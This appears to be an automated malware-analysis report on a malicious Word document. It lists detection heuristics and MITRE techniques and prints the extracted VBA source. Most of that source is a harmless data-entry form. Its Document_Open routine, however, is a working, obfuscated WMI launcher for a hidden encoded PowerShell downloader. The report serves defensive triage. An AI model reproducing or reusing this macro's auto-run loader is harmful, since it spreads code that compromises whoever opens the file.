MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros that use the `GetObject` and `CreateObject` methods to launch `winmgmts` to create a `Win32_Process`. This is a critical heuristic indicating the execution of a malicious payload. The document body explicitly instructs the user to enable editing and content, a common social engineering tactic to bypass macro security. The presence of the `macros.bas` file and the ClamAV detection further support its malicious nature as a downloader.
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-7611954-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7611954-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Sub Document_Open() Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _ Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA … -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Sub Document_Open() Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _ Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA … -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Sub Document_Open() Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _ Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA … -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _ -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13664 bytes |
SHA-256: 413f36734d8696e1c82a5b3472bc635831309e4f47b635fff71212c450911a22 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub UserForm_Initialize()
Call PopulaCombos
Call EventosCampos
Call BuscaRegistros
End Sub
Private Sub UserForm_Terminate()
Set oLoja = Nothing
Set myRst = Nothing
Call Desconecta
End Sub
Private Sub btnIncluir_Click()
Call PosDecisaoTomada("Inclusao")
End Sub
Private Sub btnAlterar_Click()
Call PosDecisaoTomada("Alteracao")
End Sub
Private Sub btnExcluir_Click()
Call PosDecisaoTomada("Exclusao")
End Sub
Private Sub PosDecisaoTomada(Decisao As String)
btnCancelar.Visible = True: btnConfirmar.Visible = True
btnConfirmar.Caption = "Confirmar " & Decisao
btnCancelar.Caption = "Cancelar " & Decisao
btnIncluir.Visible = False: btnAlterar.Visible = False: btnExcluir.Visible = False
MultiPage1.Value = 1
If Decisao <> "Exclusao" Then
If Decisao = "Inclusao" Then
Call Campos("Limpar")
End If
Call Campos("Habilitar")
txbLoja.SetFocus
End If
MultiPage1.Pages(0).Enabled = False
End Sub
Private Sub btnConfirmar_Click()
Call Gravar(Replace(btnConfirmar.Caption, "Confirmar ", ""))
End Sub
Private Sub btnCancelar_Click()
btnIncluir.Visible = True: btnAlterar.Visible = True: btnExcluir.Visible = True
btnConfirmar.Visible = False: btnCancelar.Visible = False
Call Campos("Limpar")
Call Campos("Desabilitar")
btnAlterar.Enabled = False
btnExcluir.Enabled = False
btnIncluir.SetFocus
MultiPage1.Value = 0
lstPrincipal.ListIndex = -1 ' Tira a selecao
End Sub
Private Sub lstPrincipal_Change()
Dim n As Long
If lstPrincipal.ListIndex >= 0 Then
btnAlterar.Enabled = True
btnExcluir.Enabled = True
With oLoja
.CRUD eCrud.Read, (CLng(lstPrincipal.List(lstPrincipal.ListIndex, 1)))
lblCabID.Caption = IIf(.ID = 0, "", Format(.ID, "000000"))
lblCabLoja.Caption = .Loja
txbLoja.Text = .Loja
End With
End If
End Sub
Private Sub Campos(Acao As String)
Dim sDecisao As String
Dim b As Boolean
sDecisao = Replace(btnConfirmar.Caption, "Confirmar ", "")
If Acao <> "Limpar" Then
If Acao = "Desabilitar" Then
b = False
ElseIf Acao = "Habilitar" Then
b = True
End If
MultiPage1.Pages(0).Enabled = Not b
txbLoja.Enabled = b: lblLoja.Enabled = b
Else
lblCabID.Caption = ""
lblCabLoja.Caption = ""
txbLoja.Text = Empty
End If
End Sub
Private Sub lstPrincipalPopular(Pagina As Long)
Dim n As Byte
Dim vNascimento As Variant
Dim vSalario As Variant
Dim oLegenda As Control
' Limpa cores da legenda
For n = 1 To myRst.PageSize
Set oLegenda = Controls("l" & Format(n, "00")): oLegenda.BackColor = &H8000000F
Next n
' Define pagina que sera exibida do Recordset
myRst.AbsolutePage = Pagina
With lstPrincipal
.Clear ' Limpa conteudo
.ColumnCount = 2 ' Define numero de colunas
.ColumnWidths = "180 pt; 0pt;" ' Configura largura das colunas
.Font = "Consolas" ' Configura fonte
n = 1
While Not myRst.EOF = True And n <= myRst.PageSize
' Preenche ListBox
.AddItem
.List(.ListCount - 1, 0) = myRst.Fields("loja").Value
.List(.ListCount - 1, 1) = myRst.Fields("id").Value
' Colore a legenda
' Set oLegenda = Controls("l" & Format(n, "00"))
'
' If myRst.Fields("sexo").Value = "F" Then
' oLegenda.BackColor = &HFF80FF
' ElseIf myRst.Fields("sexo").Value = "M" Then
' oLegenda.BackColor = &HFF8080
' Else
' oLegenda.BackColor = &H8000000F
' End If
' Proximo registro
myRst.MoveNext: n = n + 1
Wend
End With
' Posiciona scroll de navegacao em paginas
lblPaginaAtual.Caption = Pagina
lblNumeroPaginas.Caption = myRst.PageCount
bAtualizaScrool = False: scrPagina.Value = CLng(lblPaginaAtual.Caption): bAtualizaScrool = True
lblTotalRegistros.Caption = Format(myRst.RecordCount, "#,##0")
' Trata os botoes de navegacao
Call TrataBotoesNavegacao
End Sub
Private Sub Gravar(Decisao As String)
Dim vbResposta As VbMsgBoxResult
Dim e As eCrud
vbResposta = MsgBox("Deseja realmente fazer a " & Decisao & "?", vbYesNo + vbQuestion, "Pergunta")
If vbResposta = vbYes Then
If Decisao <> "Exclusao" Then
If txbLoja.Text = Empty Then
MsgBox "Campo 'Loja' e obrigatorio", vbCritical: MultiPage1.Value = 1: txbLoja.SetFocus
Else
With oLoja
.Loja = Replace(txbLoja.Text, "'", "`")
If Decisao = "Inclusao" Then
.CRUD eCrud.Create
Else
.CRUD eCrud.Update, .ID
End If
End With
MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
Call BuscaRegistros
End If
Else ' Se for exclusao
oLoja.CRUD eCrud.Delete, oLoja.ID
MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
Call BuscaRegistros
End If
ElseIf vbResposta = vbNo Then
If Decisao = "Exclusao" Then
Call btnCancelar_Click
End If
End If
End Sub
Private Sub EventosCampos()
' Declara variaveis
Dim oControle As MSForms.Control
Dim oEvento As c__EventoCampo
Dim sTag As String
Dim sField() As String
' Laco para percorrer todos os TextBox e atribuir eventos
' de acordo com o tipo de cada campo
For Each oControle In Me.Controls
If Len(oControle.Tag) > 0 Then
If TypeName(oControle) = "TextBox" Then
Set oEvento = New c__EventoCampo
With oEvento
sField() = Split(oControle.Tag, ".")
oControle.ControlTipText = cat.Tables(sField(0)).Columns(sField(1)).Properties("Description").Value
.FieldType = cat.Tables(sField(0)).Columns(sField(1)).Type
.MaxLength = cat.Tables(sField(0)).Columns(sField(1)).DefinedSize
.Nullable = cat.Tables(sField(0)).Columns(sField(1)).Properties("Nullable")
Set .cGeneric = oControle
End With
colControles.Add oEvento
End If
End If
Next
End Sub
Private Sub btnFiltrar_Click()
Call BuscaRegistros
End Sub
Private Sub BuscaRegistros(Optional Ordem As String)
Dim n As Byte
Dim o As Control
Set myRst = oLoja.Todos(Ordem, True)
If myRst.PageCount > 0 Then
bAtualizaScrool = False
With scrPagina
.Max = myRst.PageCount
.Value = myRst.PageCount
End With
Call lstPrincipalPopular(myRst.PageCount)
Else
lstPrincipal.Clear
For n = 1 To myRst.PageSize
Set o = Controls("l" & Format(n, "00")): o.BackColor = &H8000000F
Next n
End If
Call btnCancelar_Click
End Sub
Private Sub TrataBotoesNavegacao()
If CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) > 1 Then
btnPaginaInicial.Enabled = True
btnPaginaAnterior.Enabled = True
btnPaginaFinal.Enabled = False
btnPaginaSeguinte.Enabled = False
ElseIf CLng(lblPaginaAtual.Caption) < myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
btnPaginaInicial.Enabled = False
btnPaginaAnterior.Enabled = False
btnPaginaFinal.Enabled = True
btnPaginaSeguinte.Enabled = True
ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
btnPaginaInicial.Enabled = False
btnPaginaAnterior.Enabled = False
btnPaginaFinal.Enabled = False
btnPaginaSeguinte.Enabled = False
Else
btnPaginaInicial.Enabled = True
btnPaginaAnterior.Enabled = True
btnPaginaFinal.Enabled = True
btnPaginaSeguinte.Enabled = True
End If
End Sub
Private Sub btnPaginaInicial_Click()
Call lstPrincipalPopular(1)
End Sub
Private Sub btnPaginaAnterior_Click()
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
End Sub
Private Sub btnPaginaSeguinte_Click()
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)
End Sub
Private Sub btnPaginaFinal_Click()
Call lstPrincipalPopular(myRst.PageCount)
End Sub
Private Sub btnRegistroAnterior_Click()
If lstPrincipal.ListIndex > 0 Then
lstPrincipal.ListIndex = lstPrincipal.ListIndex - 1
ElseIf lstPrincipal.ListIndex = 0 And CLng(lblPaginaAtual.Caption) > 1 Then
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
lstPrincipal.ListIndex = myRst.PageSize - 1
ElseIf CLng(lblPaginaAtual.Caption) = 1 And lstPrincipal.ListIndex = 0 Then
MsgBox "Primeiro registro"
Exit Sub
Else
lstPrincipal.ListIndex = -1
End If
End Sub
Private Sub btnRegistroSeguinte_Click()
If lstPrincipal.ListIndex = -1 Then
lstPrincipal.ListIndex = 0
ElseIf lstPrincipal.ListIndex = myRst.PageSize - 1 And CLng(lblPaginaAtual.Caption) < myRst.PageCount Then
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)
lstPrincipal.ListIndex = 0
ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And (lstPrincipal.ListIndex + 1) = lstPrincipal.ListCount Then
MsgBox "Ultimo registro"
Exit Sub
Else
lstPrincipal.ListIndex = lstPrincipal.ListIndex + 1
End If
End Sub
Private Sub scrPagina_Change()
If bAtualizaScrool = True Then
Call lstPrincipalPopular(scrPagina.Value)
End If
End Sub
Private Sub PopulaCombos()
' With cbbSexo
' .Clear
' .ColumnCount = 2
' .ColumnWidths = "60pt; 0pt;"
'
' .AddItem
' .List(.ListCount - 1, 0) = "MASCULINO"
' .List(.ListCount - 1, 1) = "M"
'
' .AddItem
' .List(.ListCount - 1, 0) = "FEMININO"
' .List(.ListCount - 1, 1) = "F"
' End With
End Sub
Private Sub lstPrincipal_DblClick(ByVal Cancel As String)
MultiPage1.Value = 1
End Sub
Private Sub lblHdNome_Click()
Call BuscaRegistros("loja")
End Sub
Sub Document_Open()
Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBAdAEGAuBQaAQHAzBQZAQEA" + "tAAIAQHAhBAZA4CAlBQWAAHARBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBALAQHAhBAZA4CArBgSAEGAlBgbA8CAlBAdAkGAzBgLAYDAwBgcA8GAjBwLA8CA6AAc" + "AQHA0BAaAwCA0BQYAQGAuAQZAoGABBQdAUGAJBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBAIAUGAjBgcAUHAvBwUA0" + "CAgAgcAUGAmBwcA4GAhBgcAQFAzBAdAkGACBQLAQHAyBQYAQHATBAIAsDAyBQZ" + "AYGAzBgbAEGAyBAVAMHA0BQaAIEA" + "gAQZAwGA1BAZA8GANBQLAQHAyBwbAAHAtBQS ne- neddih elytswodniw- llehsrewop"), Null, Null, TerfajK)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.